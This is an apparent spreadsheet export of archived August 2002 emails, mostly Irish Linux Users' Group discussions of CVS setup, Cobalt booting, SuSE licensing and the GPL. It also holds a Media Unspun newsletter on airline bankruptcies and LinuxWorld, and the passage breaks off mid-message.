    <t>To: "'Anders Holm'" &lt;anders.holm@elivefree.net&gt;,\nFrom: "Damian O' Sullivan" &lt;Damian.OSullivan@bcs.ie&gt;\nDate: Tue, 13 Aug 2002 09:48:48 +0100</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 09:48:48 +0100</t>
  </si>
  <si>
    <t>"'Anders Holm'" &lt;anders.holm@elivefree.net&gt;,</t>
  </si>
  <si>
    <t>RE: [ILUG] Sparc Solaris (was: Dell GX260 V Redhat 7.3)</t>
  </si>
  <si>
    <t>Was the Ultra 5 the sunray server? What images did you serve to the sunrays\nto boot them over tftp/dhcp? \n\n\n&gt; \n&gt; Hi Damian.\n&gt; \n&gt; SuSe has a Sparc version I previously been running on a Sun \n&gt; Ultra 5 at \n&gt; least. Worked fine, albeit a bit slow... ;)\n&gt; \n&gt; //Anders\n&gt; \n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: &lt;macarthy@iol.ie&gt;, "Ilug@Linux.Ie" &lt;ilug@linux.ie&gt;\nFrom: "John Reilly" &lt;jr@inconspicuous.org&gt;\nDate: Tue, 13 Aug 2002 09:31:13 +0100</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 09:31:13 +0100</t>
  </si>
  <si>
    <t>&lt;macarthy@iol.ie&gt;, "Ilug@Linux.Ie" &lt;ilug@linux.ie&gt;</t>
  </si>
  <si>
    <t>Re: [ILUG] CVS question</t>
  </si>
  <si>
    <t>Assuming cvspserver is actually running (try "netstat -na | grep 2401" to\nsee if its there), make sure you have firewalling turned off or you have\nadded a rule for it.\n\n\n\n\n&gt; Hi, I'm setting up a CVS server on a RedHat 7.* box. First time.\n&gt;\n&gt; When I try to log in via telnet with an account that is in the "cvs" group\n&gt; and run\n&gt;\n&gt; cvs login\n&gt; password: xxxxx\n&gt;\n&gt; I get\n&gt;\n&gt; cvs [login aborted]: connect to localhost:2401 failed: Connection refused\n&gt;\n&gt;\n&gt; &gt; chkconfig --list  returns\n&gt;\n&gt; xinetd based services:\n&gt;         linuxconf-web:  off\n&gt;         swat:   on\n&gt;         telnet: on\n&gt;         cvspserver:     on\n&gt;\n&gt; As a cvs user\n&gt;\n&gt; [cvsdev1@localhost cvsdev1]$ echo $CVSROOT\n&gt; :pserver:cvsdev1@localhost:/home/cvsroot/repository\n&gt;\n&gt; [cvsdev1@localhost cvsdev1]$ ls -la /home/cvsroot/repository/\n&gt; total 12\n&gt; drwxrws---    3 cvs      cvs          4096 Aug 12 11:26 .\n&gt; drwxrwx---    7 cvs      cvs          4096 Aug 12 11:26 ..\n&gt; drwxrwsr-x    3 cvs      cvs          4096 Aug 12 11:26 CVSROOT\n&gt; [cvsdev1@localhost cvsdev1]$\n&gt;\n&gt;\n&gt;\n&gt; Where should I start looking?\n&gt;\n&gt; Thanks Justin\n&gt;\n&gt;\n&gt; --\n&gt; Irish Linux Users' Group: ilug@linux.ie\n&gt; [URL]http://www.linux.ie[/URL] for (un)subscription\ninformation.\n&gt; List maintainer: listmaster@linux.ie\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: zzz-unspun@example.com\nFrom: "Media Unspun" &lt;guterman@mediaunspun.imakenews.net&gt;\nDate: Tue, 13 Aug 2002 09:20:56 -0400</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 09:20:56 -0400</t>
  </si>
  <si>
    <t>United We Fall?</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format... ------------=_1029244856-11739-4 Content-Type: text/plain; charset="iso-8859-1" Content-Disposition: inline Content-Transfer-Encoding: 7bit To view this newsletter in full-color, visit: [URL]http://newsletter.mediaunspun.com[/URL] MEDIA UNSPUN What the Press is Reporting and Why ([URL]www.mediaunspun.com[/URL] ----------------------------------------------------------------- August 13, 2002 ----------------------------------------------------------------- IN THIS ISSUE ----------------------------------------------------------------- * UNITED WE FALL? * SLEEPING WITH THE PENGUIN * OTHER STORIES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 ADVERTISEMENT ----------------------------------------------------------------- Ken Fisher offers his Quarterly Report for high net worth investors FREE of cost &amp; without obligation. Access the same investment research he uses to guide his clients at: [URL]http://pcg.fisherinvestments.com[/URL] ----------------------------------------------------------------- UNITED WE FALL? ----------------------------------------------------------------- US Airways scored a $500 million bankruptcy court bailout. American Airlines announced a re-org. United Airlines' parent company's stock sank on speculation that UAL is next in line for  Chapter 11. It's a wonder none of this happened last September, but it's not much consolation to airline employees, shareholders, and customers that it's happening now. The Wall Street Journal had the most extensive coverage of American's plan as of Unspun's deadline. The airline will lay off 7,000 workers, ground some jets, cut back on flight amenities such as food, and retool its hub operations to make for longer layovers. "In the past, airlines were loath to have longer connection times because flights were listed in travel agents' computers by elapsed time," said the Journal. "Now, online booking tools and search engines most often list flights by price, not time." In this age of penny-pinching, American's worried about low-cost carriers, not the big guys like, um, US Air and United.  Speaking of United, it's hard to come up with a verb for its parent company's stock that doesn't invoke an air disaster. Let's just say it didn't go up yesterday. The $3.80 share price may be the least of UAL's worries while it waits for an increasingly unlikely $1.8 billion loan from the Air Transportation Stabilization Board. "The ATSB expects an applicant's workers, suppliers and creditors to make concessions  to help the airline repay the loans and thus protect U.S. taxpayers' interests," said the L.A. Times. Sounds nice for uninvolved taxpayers but not so good to some of United's unions,  which are balking at a wage cut. Workers did enough by deferring  $498 million in retroactive pay this year, said the 36,000-member machinists' union. Analysts moaned in anti-labor frustration.  The basic problem here is too many empty airplane seats, and non-U.S. outlets didn't have a lot of sympathy. "The U.S. government has bailed out carriers with insurance subsidies and federal loan guarantees" while "European authorities have acted more wisely," letting Swissair and Sabena "go to the wall," said  the Financial Times. Canadian pundits agreed that America should  let a couple of airlines wilt, since the Canadian airline industry benefited from the demise of Canadian Airlines and Canada 3000. Paging Charles Darwin to the white courtesy phone... - Jen Muehlbauer ----------------------------------------------------------------- ADVERTISEMENT ----------------------------------------------------------------- You've heard about identity management, but do you know about the opportunities and business models that will emerge as a result? Download a free executive summary of Esther Dyson's coverage of identity management in Release 1.0. Learn more about the expanding market for these services and applications. [URL]http://release1.edventure.com[/URL] ----------------------------------------------------------------- SLEEPING WITH THE PENGUIN ----------------------------------------------------------------- The LinuxWorld Conference and Expo, which opened yesterday in San Francisco, will host two of the strangest bedfellows ever to  lie down with a stuffed penguin: Microsoft and Sun. These are companies that once referred to Linux as a "bathtub of code" (Sun) and "a cancer" (Microsoft), according to Sun's hometown paper the San Jose Mercury News. Both companies are taking Linux seriously despite the absolute numbers. By January 2, 2001, Microsoft had made as much on server software as all Linux vendors put together would reap in the entire year. Honors for the best attention-grabber on Microsoft's presence at  the show go to Brier Dudley, who opened his piece for the Seattle Times this way: "Microsoft executive Peter Houston wasn't too worried about the reception he'd get at LinuxWorld ... until he heard about the pie cannon." Wired informed us that the section of LinuxWorld where Microsoft  will be holding the fort is dubbed the Rookery -- "a place where  you can watch companies hatch and grow right before your eyes," deadpanned reporter Michelle Delio, quoting Microsoft's Houston:  "Hatching isn't exactly on the agenda, but I certainly hope to grow." Turning to Sun, Unspun notes that five years ago a joke press release circulated on the Net claiming that Linux creator Linus Torvalds, then still living in Finland, was moving to Silicon Valley to work for Sun. The joke was that Sun had decided to scrap its Solaris operating system and instead concentrate on a version of Linux, to be called "Solinux." How time does make April fools of us all: Linus Torvalds is now thriving in Silicon  Valley (at Transmeta), and yesterday Sun Microsystems demonstrated Sun Linux 5.0. and introduced its first general-purpose servers running Linux. The Merc ran a comprehensive wrap of Sun's evolving attitude toward the upstart operating system. Sun has little choice but to embrace Linux, wrote reporter Therese Poletti, because some of its traditional Wall Street customers were deserting it. "Several investment banks have tossed out whole sections of Sun servers and replaced them with Intel-based servers running Linux," Poletti reported. And you thought Microsoft hated Linux?  - Keith Dawson Linux expo has come a long way [URL]http://www.siliconvalley.com[/URL] Microsoft changes its tune toward Linux (Seattle Times) [URL]http://makeashorterlink.com[/URL] Microsoft Puts On the Tux  [URL]http://www.wired.com[/URL],1411,54489,00.html (Hoax press release on "Solinux") [URL]http://www.ibiblio.org[/URL] Sun to name Linux-Solaris chief  [URL]http://news.com.com[/URL] Sun Microsystems flexes Linux to jab at Microsoft (Seattle Times) [URL]http://makeashorterlink.com[/URL] Microsoft and Free Software at the Same Show? It's True [URL]http://www.nytimes.com[/URL] Linux begins its descent into the enterprise [URL]http://www.internetnews.com[/URL] ----------------------------------------------------------------- OTHER STORIES ----------------------------------------------------------------- Ex-CEO Pleads Not Guilty to ImClone Fraud [URL]http://www.washingtonpost.com[/URL] Security flaw found in Microsoft Web browser (Reuters) [URL]http://www.philly.com[/URL] Fed seen leaving rates unchanged [URL]http://www.msnbc.com[/URL] Some Sad No-Signs of the Times  [URL]http://www.businessweek.com[/URL] Publisher dodges bankruptcy bullet [URL]http://www.chicagotribune.com[/URL] Gates Foundation Walks Fine Line As It Increases Its Cable Holdings [URL]http://online.wsj.com[/URL],,SB1029180416481589035,00.html (Paid subscription required.) PGP defect reveals encrypted messages [URL]http://news.com.com[/URL] Bell Labs simplifies single sign-on [URL]http://www.theregister.co.uk[/URL] Bigger Bar Code Inches Up on Retailers [URL]http://www.nytimes.com[/URL] Damn the Constitution: Europe must take back the Web [URL]http://www.theregister.co.uk[/URL] Japanese Drop Out of New ID System (Newsday, AP) [URL]http://makeashorterlink.com[/URL] ----------------------------------------------------------------- Do you want to reach the Net's savviest audience? Advertise in Media Unspun. Contact Erik Vanderkolk for details at erikvanderkolk@yahoo.com  today. ----------------------------------------------------------------- STAFF ----------------------------------------------------------------- Written by Deborah Asbrand (dasbrand@world.std.com), Keith Dawson (dawson@world.std.com), Jen Muehlbauer (jen@englishmajor.com), and Lori Patel (loripatel@hotmail.com). Copyedited by Jim Duffy (jimduffy86@yahoo.com).  Marketing: Cowpoke Productions (cowpokeproductions.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________________ POWERED BY: [URL]http://www.imakenews.com[/URL] To be removed from this list, use this link: [URL]http://www.imakenews.com[/URL] To receive future messages in HTML format, use this link: [URL]http://www.imakenews.com[/URL] To change your subscriber information, use this link: [URL]http://www.imakenews.com[/URL] ------------=_1029244856-11739-4 Content-Type: text/html; charset="iso-8859-1" Content-Disposition: inline Content-Transfer-Encoding: 7bit       M E D I A  U N S P U N     Pass it on... 					 					What the Press is Reporting and Why ([URL]www.mediaunspun.com[/URL] 					 					 				 				 					 					 						 							Tuesday, August 13, 2002 						 					 					 					 				   Top Spins... 			 						 				 			 			United We Fall? 			 				 			 			 			 			 			 						 				 			 			Sleeping with the Penguin 			 				 			 			 			 			   			 						 				 			 			Other Stories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Sponsor Ken Fisher offers his Quarterly Report for high net worth investors FREE of cost &amp; without obligation. Access the same investment research he uses to guide his clients at: [URL]http://pcg.fisherinvestments.com[/URL]  			 			 			 			 			 			United We Fall? 			 			 			 US Airways scored a $500 million bankruptcy court bailout. American Airlines announced a re-org. United Airlines' parent company's stock sank on speculation that UAL is next in line for Chapter 11. It's a wonder none of this happened last September, but it's not much consolation to airline employees, shareholders, and customers that it's happening now. The Wall Street Journal had the most extensive coverage of American's plan as of Unspun's deadline. The airline will lay off 7,000 workers, ground some jets, cut back on flight amenities such as food, and retool its hub operations to make for longer layovers. "In the past, airlines were loath to have longer connection times because flights were listed in travel agents' computers by elapsed time," said the Journal. "Now, online booking tools and search engines most often list flights by price, not time." In this age of penny-pinching, American's worried about low-cost carriers, not the big guys like, um, US Air and United.  Speaking of United, it's hard to come up with a verb for its parent company's stock that doesn't invoke an air disaster. Let's just say it didn't go up yesterday. The $3.80 share price may be the least of UAL's worries while it waits for an increasingly unlikely $1.8 billion loan from the Air Transportation Stabilization Board. "The ATSB expects an applicant's workers, suppliers and creditors to make concessions to help the airline repay the loans and thus protect U.S. taxpayers' interests," said the L.A. Times. Sounds nice for uninvolved taxpayers but not so good to some of United's unions, which are balking at a wage cut. Workers did enough by deferring $498 million in retroactive pay this year, said the 36,000-member machinists' union. Analysts moaned in anti-labor frustration.  The basic problem here is too many empty airplane seats, and non-U.S. outlets didn't have a lot of sympathy. "The U.S. government has bailed out carriers with insurance subsidies and federal loan guarantees" while "European authorities have acted more wisely," letting Swissair and Sabena "go to the wall," said the Financial Times. Canadian pundits agreed that America should let a couple of airlines wilt, since the Canadian airline industry benefited from the demise of Canadian Airlines and Canada 3000. Paging Charles Darwin to the white courtesy phone... - Jen Muehlbauer Sponsor 			  				 					 					You've heard about identity management, but do you know about the opportunities and business models that will emerge as a result? Download a free executive summary of Esther Dyson's coverage of identity management in Release 1.0. Learn more about the expanding market for these services and applications. 					 					 			 			 			 			 			 			Sleeping with the Penguin 			 			 			 The LinuxWorld Conference and Expo, which opened yesterday in San Francisco, will host two of the strangest bedfellows ever to lie down with a stuffed penguin: Microsoft and Sun. These are companies that once referred to Linux as a "bathtub of code" (Sun) and "a cancer" (Microsoft), according to Sun's hometown paper the San Jose Mercury News. Both companies are taking Linux seriously despite the absolute numbers. By January 2, 2001, Microsoft had made as much on server software as all Linux vendors put together would reap in the entire year. Honors for the best attention-grabber on Microsoft's presence at the show go to Brier Dudley, who opened his piece for the Seattle Times this way: "Microsoft executive Peter Houston wasn't too worried about the reception he'd get at LinuxWorld ... until he heard about the pie cannon." Wired informed us that the section of LinuxWorld where Microsoft will be holding the fort is dubbed the Rookery -- "a place where you can watch companies hatch and grow right before your eyes," deadpanned reporter Michelle Delio, quoting Microsoft's Houston: "Hatching isn't exactly on the agenda, but I certainly hope to grow." Turning to Sun, Unspun notes that five years ago a joke press release circulated on the Net claiming that Linux creator Linus Torvalds, then still living in Finland, was moving to Silicon Valley to work for Sun. The joke was that Sun had decided to scrap its Solaris operating system and instead concentrate on a version of Linux, to be called "Solinux." How time does make April fools of us all: Linus Torvalds is now thriving in Silicon Valley (at Transmeta), and yesterday Sun Microsystems demonstrated Sun Linux 5.0. and introduced its first general-purpose servers running Linux. The Merc ran a comprehensive wrap of Sun's evolving attitude toward the upstart operating system. Sun has little choice but to embrace Linux, wrote reporter Therese Poletti, because some of its traditional Wall Street customers were deserting it. "Several investment banks have tossed out whole sections of Sun servers and replaced them with Intel-based servers running Linux," Poletti reported. And you thought Microsoft hated Linux? - Keith Dawson Linux expo has come a long way [URL]http://www.siliconvalley.com[/URL]  Microsoft changes its tune toward Linux (Seattle Times) [URL]http://makeashorterlink.com[/URL]  Microsoft Puts On the Tux  [URL]http://www.wired.com[/URL],1411,54489,00.html  (Hoax press release on "Solinux") [URL]http://www.ibiblio.org[/URL]  Sun to name Linux-Solaris chief  [URL]http://news.com.com[/URL]  Sun Microsystems flexes Linux to jab at Microsoft (Seattle Times) [URL]http://makeashorterlink.com[/URL]  Microsoft and Free Software at the Same Show? It's True [URL]http://www.nytimes.com[/URL]  Linux begins its descent into the enterprise [URL]http://www.internetnews.com[/URL]  			 			 			 			 			 			Other Stories 			 			 			 Ex-CEO Pleads Not Guilty to ImClone Fraud [URL]http://www.washingtonpost.com[/URL]  Security flaw found in Microsoft Web browser (Reuters) [URL]http://www.philly.com[/URL]  Fed seen leaving rates unchanged [URL]http://www.msnbc.com[/URL]  Some Sad No-Signs of the Times  [URL]http://www.businessweek.com[/URL]  Publisher dodges bankruptcy bullet [URL]http://www.chicagotribune.com[/URL]  Gates Foundation Walks Fine Line As It Increases Its Cable Holdings [URL]http://online.wsj.com[/URL],,SB1029180416481589035,00.html  (Paid subscription required.) PGP defect reveals encrypted messages [URL]http://news.com.com[/URL]  Bell Labs simplifies single sign-on [URL]http://www.theregister.co.uk[/URL]  Bigger Bar Code Inches Up on Retailers [URL]http://www.nytimes.com[/URL]  Damn the Constitution: Europe must take back the Web [URL]http://www.theregister.co.uk[/URL]  Japanese Drop Out of New ID System (Newsday, AP) [URL]http://makeashorterlink.com[/URL]  Sponsor 			  				 					 					Do you want to reach the Net's savviest audience? Advertise in Media Unspun. Contact Erik Vanderkolk for details at erikvanderkolk@yahoo.com today. 					 					 			 			 			 			 			 			Staff 			 			 			 			  				 					 					Written by Deborah Asbrand (dasbrand@world.std.com), Keith Dawson (dawson@world.std.com), Jen Muehlbauer (jen@englishmajor.com), and Lori Patel (loripatel@hotmail.com). Copyedited by Jim Duffy (jimduffy86@yahoo.com). Marketing: Cowpoke Productions (cowpokeproductions.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SUBSCRIBE 		 	  Enter your email address in the box below to receive a free four-week trial of Media Unspun:  			 			Add 			 		 	  		 		 		Remove 		 SendasHTML Â  	 	 Newsletter Services Provided by iMakeNews.com   TELL A FRIEND   Powered by iMakeNews.comâ„¢ This email was sent to: zzz-unspun@example.com Click here to be instantly removed from this list.Click here to receive future messages in plain text format.Click here to change your subscriber information and preferences. Â  		    	            ------------=_1029244856-11739-4--</t>
  </si>
  <si>
    <t>http://newsletter.mediaunspun.com www.mediaunspun.com http://www.mediaunspun.com http://pcg.fisherinvestments.com http://release1.edventure.com http://www.siliconvalley.com http://makeashorterlink.com http://www.wired.com http://www.ibiblio.org http://news.com.com http://makeashorterlink.com http://www.nytimes.com http://www.internetnews.com http://www.washingtonpost.com http://www.philly.com http://www.msnbc.com http://www.businessweek.com http://www.chicagotribune.com http://online.wsj.com http://news.com.com http://www.theregister.co.uk http://www.nytimes.com http://www.theregister.co.uk http://makeashorterlink.com http://www.mediaunspun.com http://newsletter.mediaunspun.com http://www.imakenews.com http://www.imakenews.com http://www.imakenews.com http://www.imakenews.com www.mediaunspun.com http://www.mediaunspun.com http://pcg.fisherinvestments.com http://www.siliconvalley.com http://makeashorterlink.com http://www.wired.com http://www.ibiblio.org http://news.com.com http://makeashorterlink.com http://www.nytimes.com http://www.internetnews.com http://www.washingtonpost.com http://www.philly.com http://www.msnbc.com http://www.businessweek.com http://www.chicagotribune.com http://online.wsj.com http://news.com.com http://www.theregister.co.uk http://www.nytimes.com http://www.theregister.co.uk http://makeashorterlink.com http://www.mediaunspun.com http://newsletter.mediaunspun.com</t>
  </si>
  <si>
    <t>To: irish linux users group &lt;ilug@linux.ie&gt;\nFrom: kevin lyda &lt;kevin+dated+1029657778.1331e2@ie.suberic.net&gt;\nDate: Tue, 13 Aug 2002 09:02:53 +0100</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 09:02:53 +0100</t>
  </si>
  <si>
    <t>kevin lyda &lt;kevin+dated+1029657778.1331e2@ie.suberic.net&gt;</t>
  </si>
  <si>
    <t>On Tue, Aug 13, 2002 at 12:48:18AM +0100, wintermute wrote:\n&gt; How unimaginably difficult is this to do?\n&gt; There are as far as I know, no Linux kernel hackers, nor distros that originate from this fair island right?\n&gt; Right.\n\ni think there's a mailing list on linux.ie for this.\n\nalso, there's niall's work on the bbc.  no, not that bbc, the bootable\nbusiness card.\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ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: "John P. Looney" &lt;valen@tuatha.org&gt;\nDate: Tue, 13 Aug 2002 08:48:55 +0100</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 08:48:55 +0100</t>
  </si>
  <si>
    <t>On Tue, Aug 13, 2002 at 12:48:18AM +0100, wintermute mentioned:\n&gt; How unimaginably difficult is this to do?  There are as far as I know,\n&gt; no Linux kernel hackers, nor distros that originate from this fair\n&gt; island right?  Right.\n\n Antefacto Embedded Linux...did.\n\n Nice little distro that'd run on a 64MB flash card (with 12MB free), with\na read-only root filesystem. Perfect for little embedded systems. It was a\nvery cut down version of RedHat 7.2.\n\n Must see can we release the build system &amp; everything. That was the\ninteresting bit. Distros, in general, are a waste of time. You've no idea\nhow much better something like Debian or RedHat could be than something\nyou did yourself, unless you picked a niche area.\n\nKate\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: "John P. Looney" &lt;valen@tuatha.org&gt;\nDate: Tue, 13 Aug 2002 08:46:22 +0100</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 08:46:22 +0100</t>
  </si>
  <si>
    <t>On Tue, Aug 13, 2002 at 06:54:28AM +0100, Anders Holm mentioned:\n&gt; let me guess, you haven't tried the boot parameter root=/dev/hda2 if you\n&gt; are using lilo??\n\n Ah, you see - cobalt's don't use lilo. They have an openboot-like prom\nthat looks in an ext2 partition in /dev/hda1 for a file called\n/boot/vmlinux.gz - nothing else.\n\n The only way I think you can set parameters is with a "set_params" line.\n\n However, when I run \n    set_params root=/dev/hda2\n and then run:\n    bfd /boot/vmlinux.gz\n\n It boots the old kernel, I assume from the prom. It seems to do this, if\nsomething goes wrong - no error, just boots the default kernel.\n\n BTW, 'bfd' means 'boot from disk'.\n\nKate\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: "John P. Looney" &lt;valen@tuatha.org&gt;\nDate: Tue, 13 Aug 2002 08:38:47 +0100</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 08:38:47 +0100</t>
  </si>
  <si>
    <t>On Tue, Aug 13, 2002 at 01:40:21AM +0200, Paul Linehan mentioned:\n&gt; And, as I've tried to explain, is not the licence\n&gt; terms on, say, trials for commercial company x\n&gt; to which I object, it is the way SuSE appears, \n&gt; at least to my I.T. peasant self, to have\n&gt; mixed up proprietary and open stuff.\n\n Indeed. Personally, I think it's the sort of reprehensible behavior that\nsplit Unix way-back-when into the mess it was in a few years back, before\nLinux...got rid of most of them.\n\n Vendors wrote their own wierd-ass installers &amp; config tools to lock\npeople to their OS, they added all sorts of functionality that was not\navailible to other OSes to make themselves different from the competition\n(Motif on non-free OSes, incompatible filesystems etc).\n\n While a good idea when you share code &amp; standards, in an environment\nwhere you do neither, the user suffers.\n\nKate\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: Graham.Smith@it-tallaght.ie, ilug@linux.ie\nFrom: Baldwin_James@emc.com\nDate: Tue, 13 Aug 2002 07:12:22 -0400</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 07:12:22 -0400</t>
  </si>
  <si>
    <t>Baldwin_James@emc.com</t>
  </si>
  <si>
    <t>Graham.Smith@it-tallaght.ie, ilug@linux.ie</t>
  </si>
  <si>
    <t>Try that on a Sun :( you have to disect the keyboard \n\n-----Original Message-----\nFrom: Smith, Graham - Computing Technician\n[mailto:Graham.Smith@it-tallaght.ie]\nSent: Tuesday, August 13, 2002 12:07 PM\nTo: ilug@linux.ie\nSubject: RE: [ILUG] I hate noise!\n\n\nI ususally disconnect the internal speaker - thats pretty sure to stop any\nbeeping!\n\nG.\n___________________________\n Graham Smith,\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: wintermute &lt;cout@eircom.net&gt;\nFrom: Paul Jakma &lt;paul@clubi.ie&gt;\nDate: Tue, 13 Aug 2002 03:22:54 +0100 (IST)</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 03:22:54 +0100 (IST)</t>
  </si>
  <si>
    <t>wintermute &lt;cout@eircom.net&gt;</t>
  </si>
  <si>
    <t>On Tue, 13 Aug 2002, wintermute wrote:\n\n&gt; There are as far as I know, no Linux kernel hackers, nor distros\n&gt; that originate from this fair island right? Right.\n\nthere are at least 3 irish kernel hackers (active/inactive) on this\nlist.\n\nregards,\n-- \nPaul Jakma	paul@clubi.ie	paul@jakma.org	Key ID: 64A2FF6A\n	warning: do not ever send email to spam@dishone.st\nFortune:\nLet the people think they govern and they will be governed.\n		-- William Penn, founder of Pennsylvania\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: wintermute &lt;cout@eircom.net&gt;\nFrom: Kenn Humborg &lt;kenn@linux.ie&gt;\nDate: Tue, 13 Aug 2002 01:51:09 +0100</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 01:51:09 +0100</t>
  </si>
  <si>
    <t>Kenn Humborg &lt;kenn@linux.ie&gt;</t>
  </si>
  <si>
    <t>On Tue, Aug 13, 2002 at 12:48:18AM +0100, wintermute wrote: &gt; Rick Moen  wrote: &gt;  &gt;  &gt; &gt; Don't like SuSE's product licensing?  Write your own distribution.  You &gt; &gt; can even grab most of what you need _from SuSE_.  All you have to do is  &gt; &gt; heed the licensing terms on the individual pieces. &gt;  &gt;  &gt; How unimaginably difficult is this to do? It shouldn't be too hard.  Red Hat, for example, ships with everything you need to build a modified distribution.  And it's all GPL (or free enough). &gt; There are as far as I know, no Linux kernel hackers,  Ahem.  There are more than one. &gt; nor distros  &gt; that originate from this fair island right? &gt; Right. &gt;  &gt; Yes it might be very,very difficult and subject to abject failure  &gt; in sticking together a distro.... call it Dolmen Linux (or other),  &gt; no doubt the packaging system would be one of the first places &gt;  such a suggestion would stumble. &gt; Some (like me) favouring a FreeBSD style ports system others favouring &gt;  a Debian style system and others still favouring *rpm style packaging. &gt;  &gt; That said other *LUG have done interesting things like making blackbox. &gt;  &gt; Perhaps making a distro would be ..... umm.... fun. There was talk of this in the past.  Taking a regular distribution like Red Hat or Debian and tweaking it for Ireland - things like translations, ISP setups, default bookmarks. Never took off. Why not try it yourself. Later, Kenn --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: Paul Linehan &lt;plinehan@yahoo.com&gt;\nFrom: Kenn Humborg &lt;kenn@linux.ie&gt;\nDate: Tue, 13 Aug 2002 01:45:37 +0100</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 01:45:37 +0100</t>
  </si>
  <si>
    <t>Paul Linehan &lt;plinehan@yahoo.com&gt;</t>
  </si>
  <si>
    <t>On Tue, Aug 13, 2002 at 01:40:21AM +0200, Paul Linehan wrote: &gt;  &gt; Rick Moen  a crit: ... &gt; &gt; You're further confused if you think the GNU  &gt; &gt; GPL gives you the right to get covered software &gt; &gt; for free.  It does not.   &gt;  &gt; All I want is the OS and GNU apps. I was under &gt; the impression that for *_those_* all one &gt; needed was to pay for the media and not for the &gt; code itself? &gt;  &gt; Ai-je tort? &gt;  &gt;  &gt; &gt; It provides that _if_ you've lawfully received &gt; &gt; a copy of the covered binary version, you have &gt; &gt; rights to also receive the matching source code. &gt;  &gt; My understanding was that binaries or whatever &gt; could be received for the cost of the media plus &gt; a token of one's appreciation (the latter being &gt; subject to agreement between the parties) - I was &gt; offering a bottle of wine plus maybe a pint or two &gt; and a chat for a copy - I don't know what the going &gt; rate is. The GPL makes no stipulations about charging for binaries. In fact, you can go get the sources for, say, GNU's /bin/true, compile it yourself and try selling the resulting binary for EUR 1000.  (And, with a good enough sales pitch, you just might get away with it!) However, what the GPL does stipulate is that you must  provide the sources for that binary if asked.  So I might buy it from you for EUR 1000, compile it myself and sell that binary for EUR 1.  Of course, I'll need to provide the sources to anyone that asks as well.  But, I just might make money at this, since there might be a market of 10000 people who would pay 1 euro for the convenience of getting a binary. But then, John Looney would step in, buy it from me for 1 euro, burn it and the sources and some of his favourite /bin/true patches on a CD and duplicate it for the cost of the media or a cream bun, depending on how hungry he is. You see, the GPL doesn't force the binaries to be zero-cost (or cost-of-media), but it puts a really big hole in any business plan that solely resells GPL software.  You _can_ charge for it if you want, but you bloody well better be providing some value for that money, or you'll go out of business faster than a dot-com in 2001. And there are real ways to provide this value for money (convenience of getting it on one CD, convenience of a friendly installer, convenience of vendor-supplied updates, convenience of having what lots of other people have, posting a CD and paying a few euro is cheaper than downloading over a modem, warm fuzzy feeling of getting something from a "real" company, etc). There will be segments of the market that will pay various amounts for GPL software and there will be others that don't. Thankfully, the GPL allows for both, _by_design_.  But the source will always be free (or minimal cost). Later, Kenn --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: =?iso-8859-1?q?Paul=20Linehan?= &lt;plinehan@yahoo.com&gt;\nDate: Tue, 13 Aug 2002 01:40:21 +0200 (CEST)</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 01:40:21 +0200 (CEST)</t>
  </si>
  <si>
    <t>Rick Moen  a crit: &gt; &gt; I'm confused. I thought it was GPL'ed and that  &gt; &gt; the money you paid SuSE was for your 60 day &gt; &gt; support or whatever?    &gt; Yes, you're confused. I *_was_* confused. &gt; A Linux distribution (_any_ Linux distribution) &gt; contains lots and lots of separate codebases. &gt; Some are under the GNU GPL. Many are not. Indeed - that I actually had understood prior to all this - for example commercial entities with trial/limited/crippled editions.  Which is no problem - I don't see why that should be a problem for SuSE though - surely the  more the merrrier as far as they're concerned. &gt; Are you clear on this point, now? Vide supra. &gt; This is my second try.  Mighty white of you, old bean. &gt;  One suspects that you actually understand &gt;  perfectly, but just don't like it. One can suspect what one likes. What I didn't  understand was that SuSE had proprietary  extensions that it wasn't prepared to allow people to use under the GPL or even under  a FreeBSD style licence. I thought that the model for the likes of  SuSE was selling support and customisation,  rather than what I thought of as the core "product". I thought that the likes of Yast came under core - maybe it worked in the glory days before, say, 2001 - I can understand that they might want to make more money, but the way in which they have done it, seems to me, to be  be against the spirit of the GPL.   &gt; You're further confused if you think the GNU  